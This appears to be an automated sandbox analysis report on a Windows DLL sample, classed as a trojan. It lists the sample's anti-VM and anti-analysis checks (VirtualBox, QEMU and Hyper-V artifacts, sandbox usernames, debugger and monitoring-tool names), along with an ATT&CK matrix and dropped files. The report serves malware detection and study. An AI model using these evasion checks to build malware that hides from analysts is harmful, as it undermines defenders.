              Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
              Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\System32\loaddll64.exe TID: 6544 Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\rundll32.exe File opened / queried: VBoxGuest
              Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
              Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys
              Source: C:\Windows\System32\rundll32.exe File opened / queried: VBoxTrayIPC
              Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\vboxtray.exe
              Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\vboxhook.dll
              Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
              Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys
              Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys
              Source: C:\Windows\System32\rundll32.exe File opened / queried: \pipe\VBoxTrayIPC
              Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys
              Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Windows\System32\rundll32.exe File opened / queried: VBoxMiniRdrDN
              Source: C:\Windows\System32\rundll32.exe File opened / queried: C:\Windows\System32\vboxservice.exe
              Source: C:\Windows\System32\rundll32.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Windows\System32\rundll32.exe API coverage: 5.2 %
              Source: C:\Windows\System32\rundll32.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,14_2_00000215205D0220
              Source: C:\Windows\System32\rundll32.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,19_2_00000285C80A0220
              Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,2_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,2_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exe Code function: 2_2_00007FFA535EE00C FindFirstFileExA,2_2_00007FFA535EE00C
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_0000021520614570 FindFirstFileExA,14_2_0000021520614570
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535F9C34 ExitProcess,GetLastError,FindFirstFileA,ConnectNamedPipe,CreateFileA,14_2_00007FFA535F9C34
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,14_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exe Code function: 14_2_00007FFA535EE00C FindFirstFileExA,14_2_00007FFA535EE00C
              Source: C:\Windows\System32\rundll32.exe Code function: 19_2_00000285C80E4570 FindFirstFileExA,19_2_00000285C80E4570
              Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
              Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node graph_2-7955
              Source: C:\Windows\System32\rundll32.exe API call chain: ExitProcess graph end node graph_2-8036
              Source: rundll32.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: rundll32.exe Binary or memory string: vboxtray.exe
              Source: rundll32.exe, 0000000E.00000002.546408144.000002152028C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.548511801.00000285C7D5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HMicrosoft-Windows-Hyper-V-Hypervisor
              Source: rundll32.exe Binary or memory string: Checking qemu processes %s
              Source: rundll32.exe Binary or memory string: qemu-ga.exe
              Source: rundll32.exe Binary or memory string: \\.\VBoxMiniRdrDN
              Source: WerFault.exe, 00000017.00000003.531814620.000001CE20763000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000002.541991231.000001CE1EA66000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000002.542772741.000001CE20763000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000002.540850125.00000186843CB000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.540993777.000001F5F18BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: rundll32.exe Binary or memory string: VBoxTrayToolWnd
              Source: rundll32.exe Binary or memory string: \\.\VBoxTrayIPC
              Source: WerFault.exe, 00000019.00000003.535159919.000001F5F35BF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.541980614.000001F5F35BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWWi
              Source: rundll32.exe Binary or memory string: HARDWARE\ACPI\RSDT\VBOX__
              Source: rundll32.exe Binary or memory string: VBoxTrayToolWndClass
              Source: rundll32.exe Binary or memory string: \\.\pipe\VBoxTrayIPC
              Source: WerFault.exe, 00000019.00000002.540993777.000001F5F18BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW,
              Source: rundll32.exe Binary or memory string: System32\drivers\VBoxMouse.sys
              Source: rundll32.exe Binary or memory string: System32\vboxhook.dll
              Source: rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPCVBoxTrayToolWndClassChecking device %s VirtualBox Shared FoldersVBoxTrayToolWndvboxtray.exevboxservice.exeSELECT * FROM Win32_NetworkAdapterConfigurationChecking VirtualBox process %s 08:00:27MACAddressVBoxVideoW8vboxvideoSELECT * FROM Win32_NTEventlogFileVBoxWddmSystemFileNameVirtualBoxSourcesVBOXvboxDeviceIdSELECT * FROM Win32_PnPEntityNamePCI\VEN_80EE&DEV_CAFE82441FX82801FBOpenHCD82371SBACPIBus_BUS_0SELECT * FROM Win32_BusPNP_BUS_0PCI_BUS_0ProductSELECT * FROM Win32_BaseBoardManufacturerVirtualBoxSELECT * FROM Win32_PnPDeviceOracle CorporationPNPDeviceIDCaptionVEN_VBOXqemu-ga.exeQEMUvdservice.exevdagent.exeqemu-gaChecking qemu processes %s Checking QEMU directory %s SPICE Guest ToolsQEMUqemuBXPCBOCHSSOFTWARE\Winewine_get_unix_file_nameSYSTEM\ControlSet001\Services\vioscsiSYSTEM\ControlSet001\Services\VirtIO-FS ServiceSYSTEM\ControlSet001\Services\viostorSYSTEM\ControlSet001\Services\BALLOONSYSTEM\ControlSet001\Services\VirtioSerialSYSTEM\ControlSet001\Services\netkvmSYSTEM\ControlSet001\Services\BalloonServiceSystem32\drivers\netkvm.sysSystem32\drivers\balloon.sysSystem32\drivers\viofs.sysSystem32\drivers\pvpanic.sysSystem32\drivers\vioinput.sysSystem32\drivers\viogpudo.sysSystem32\drivers\vioscsi.sysSystem32\drivers\viorng.sysSystem32\drivers\viostor.sysSystem32\drivers\vioser.sysVirtio-Win\CurrentUserEmilySandboxHong LeeHAPUBWSJohnsonIT-ADMINmilozsMillertimmyPeter Wilsonmalwaresand boxtest usermaltestJohn DoevirusChecking if username matches : %s VMWareSELECT * FROM Win32_ComputerSystemHVM domUModelprocexp64.exeDesktopprl_cc.exeChecking Parallels processes: %sprl_tools.exe
              Source: rundll32.exe Binary or memory string: System32\vboxmrxnp.dll
              Source: rundll32.exe, 0000000E.00000003.542606221.000002151E55E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.546717139.00000285C5F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: rundll32.exe Binary or memory string: VMUSrvc.exe
              Source: WerFault.exe, 00000017.00000002.542008698.000001CE1EA6F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.532035053.000001CE1EA6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWetry.microsoft.com
              Source: rundll32.exe Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
              Source: rundll32.exe Binary or memory string: qemu-ga
              Source: WerFault.exe, 00000019.00000003.531127482.000001F5F35C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWWi%SystemRoot%\system32\mswsock.dllCommon Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
              Source: rundll32.exe Binary or memory string: System32\drivers\VBoxGuest.sys
              Source: WerFault.exe, 00000018.00000003.530557486.0000018686244000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWTH%SystemRoot%\system32\mswsock.dlllfons\AppData\LocalLOGONSERVER=\\computer
              Source: rundll32.exe Binary or memory string: VMSrvc.exe
              Source: rundll32.exe Binary or memory string: SYSTEM\ControlSet001\Services\VBoxGuest
              Source: rundll32.exe Binary or memory string: SYSTEM\ControlSet001\Services\VBoxService
              Source: rundll32.exe, 00000013.00000002.548692492.00000285C7F36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >VMUSrvc.exeVMSrvc.exeChecking Virtual PC processes %s
              Source: rundll32.exe Binary or memory string: SYSTEM\ControlSet001\Services\VBoxMouse
              Source: rundll32.exe Binary or memory string: VMWare
              Source: rundll32.exe Binary or memory string: System32\vboxservice.exe
              Source: rundll32.exe Binary or memory string: Checking QEMU directory %s
              Source: WerFault.exe, 00000018.00000002.541137565.0000018686244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWTH`P=
              Source: rundll32.exeBinary or memory string: \\.\VBoxGuest
              Source: rundll32.exeBinary or memory string: vboxservice.exe
              Source: rundll32.exeBinary or memory string: System32\vboxtray.exe
              Source: rundll32.exeBinary or memory string: HARDWARE\ACPI\FADT\VBOX__
              Source: rundll32.exeBinary or memory string: System32\drivers\VBoxSF.sys
              Source: WerFault.exe, 00000018.00000002.540850125.00000186843CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWDH
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E8054 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFA535E8054
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C5490 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,SysAllocString,_com_issue_error,VariantInit,VariantInit,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,14_2_00000215205C5490
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EF3D4 GetProcessHeap,2_2_00007FFA535EF3D4
              Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPort
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 316
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E8054 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFA535E8054
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E372C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFA535E372C
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F5204 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFA535F5204
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205FA8B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000215205FA8B0
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_0000021520627470 SetUnhandledExceptionFilter,14_2_0000021520627470
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205F5DD8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00000215205F5DD8
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535F5204 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FFA535F5204
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E372C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFA535E372C
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535E8054 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FFA535E8054
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80C5DD8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000285C80C5DD8
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80F7470 SetUnhandledExceptionFilter,19_2_00000285C80F7470
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80CA8B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000285C80CA8B0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D0330 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,14_2_00000215205D0330
              Source: C:\Windows\System32\rundll32.exeCode function: 19_2_00000285C80A0330 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,19_2_00000285C80A0330
              Source: C:\Windows\System32\rundll32.exeThread register set: 6960 A0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 316
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7072 -s 316
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7140 -s 316
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,14_2_0000021520611FB0
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00000215206120E8
              Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,14_2_00000215205F41C0
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,14_2_000002152060C574
              Source: C:\Windows\System32\rundll32.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,14_2_00000215205F47D8
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,14_2_000002152060CB80
              Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,14_2_00000215206116FC
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,14_2_0000021520611A08
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,14_2_0000021520611AD8
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_0000021520611B70
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,14_2_0000021520611DB4
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_0000021520611F00
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,19_2_00000285C80E1A08
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,19_2_00000285C80E1AD8
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_00000285C80E1B70
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,19_2_00000285C80E1DB4
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_00000285C80E1F00
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,19_2_00000285C80E1FB0
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00000285C80E20E8
              Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,19_2_00000285C80C41C0
              Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,19_2_00000285C80E16FC
              Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,19_2_00000285C80DCB80
              Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,19_2_00000285C80DC574
              Source: C:\Windows\System32\rundll32.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,19_2_00000285C80C47D8
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F1AD0 cpuid 2_2_00007FFA535F1AD0
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535F9404 FindFirstFileA,CreateNamedPipeA,2_2_00007FFA535F9404
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535E3628 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00007FFA535E3628
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EB2BC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFA535EB2BC
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205CF810 GetUserNameW,14_2_00000215205CF810
              Source: rundll32.exeBinary or memory string: procmon.exe
              Source: rundll32.exeBinary or memory string: tcpview.exe
              Source: rundll32.exeBinary or memory string: Wireshark.exe
              Source: rundll32.exeBinary or memory string: procexp.exe
              Source: rundll32.exeBinary or memory string: LordPE.exe
              Source: rundll32.exeBinary or memory string: autoruns.exe
              Source: rundll32.exeBinary or memory string: ollydbg.exe
              Source: rundll32.exeBinary or memory string: regmon.exe
              | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
              | Valid Accounts | 2 Windows Management Instrumentation | Path Interception | 212 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
              | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 331 Virtualization/Sandbox Evasion | LSASS Memory | 551 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
              | Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 212 Process Injection | Security Account Manager | 331 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
              | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 11 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
              | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
              | Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Rundll32 | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
              | External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
              | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
              | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 File and Directory Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
              | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 222 System Information Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
              Behavior graph (ID: 659464, Sample: o7m2se.dll, Startdate: 08/07/2022, Architecture: WINDOWS, Score: 100): loaddll64.exe started rundll32.exe processes, which started WerFault.exe processes that dropped C:\ProgramData\Microsoft\...\Report.wer files.

              No Antivirus matches
              No contacted domains info
              IP
              192.168.2.1
              Joe Sandbox Version:35.0.0 Citrine
              Analysis ID:659464
              Start date and time: 2022-07-08 07:54:15 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 12m 31s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:o7m2se.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:42
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winDLL@33/24@0/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 49.1% (good quality ratio 38.7%)
              • Quality average: 53.2%
              • Quality standard deviation: 35.8%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 108
              • Number of non-executed functions: 244
              Cookbook Comments:
              • Found application associated with file extension: .dll
              • Adjust boot time
              • Enable AMSI
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 40.74.108.123, 23.205.181.161, 52.183.220.149, 13.89.179.12, 20.42.65.92, 20.189.173.20
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, settings-prod-scus-2.southcentralus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, settings-prod-wjp-1.japanwest.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, atm-settingsfe-prod-weighted.trafficmanager.net, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, licensing.mp.microsoft.com, go.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
              • Not all processes were analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              Time  Type  Description
              07:55:41  API Interceptor  1x Sleep call for process: loaddll64.exe modified
              07:56:14  API Interceptor  6x Sleep call for process: WerFault.exe modified
              No context
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7565859812727551
              Encrypted:false
              Malicious:true
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7569492849281425
              Encrypted:false
              Malicious:true
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7566228112167848
              Encrypted:false
              Malicious:true
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7556367581494399
              Encrypted:false
              Malicious:true
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.756667984621082
              Encrypted:false
              Malicious:true
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7565364865976272
              Encrypted:false
              Malicious:true
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:55:32 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):68806
              Entropy (8bit):1.512842655359008
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:55:33 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56346
              Entropy (8bit):1.6841046640872415
              Encrypted:false
              Malicious:false
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8682
              Entropy (8bit):3.696758228200209
              Encrypted:false
              Malicious:false
